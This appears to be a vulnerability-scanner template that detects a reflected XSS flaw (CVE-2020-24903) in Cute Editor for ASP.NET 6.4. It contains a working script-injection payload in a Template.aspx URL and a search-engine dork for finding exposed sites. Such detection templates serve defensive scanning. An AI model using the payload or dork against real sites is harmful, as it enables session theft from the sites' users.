38 lines
1.3 KiB
YAML
38 lines
1.3 KiB
YAML
|
id: CVE-2020-24903
|
||
|
|
||
|
info:
|
||
|
name: Cute Editor for ASP.NET 6.4 - Reflected XSS
|
||
|
author: edoardottt
|
||
|
severity: medium
|
||
|
description: |
|
||
|
Cute Editor for ASP.NET 6.4 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
|
||
|
reference:
|
||
|
- https://seclists.org/bugtraq/2016/Mar/104
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
|
||
|
classification:
|
||
|
cve-id: CVE-2020-24903
|
||
|
metadata:
|
||
|
google-dork: inurl:/CuteSoft_Client/CuteEditor/ Template.aspx
|
||
|
verified: "true"
|
||
|
tags: cve,cve2022,cuteeditor,xss
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";><script>alert(document.domain)</script>"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- "text/html"
|
||
|
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "<script>alert(document.domain)</script>"
|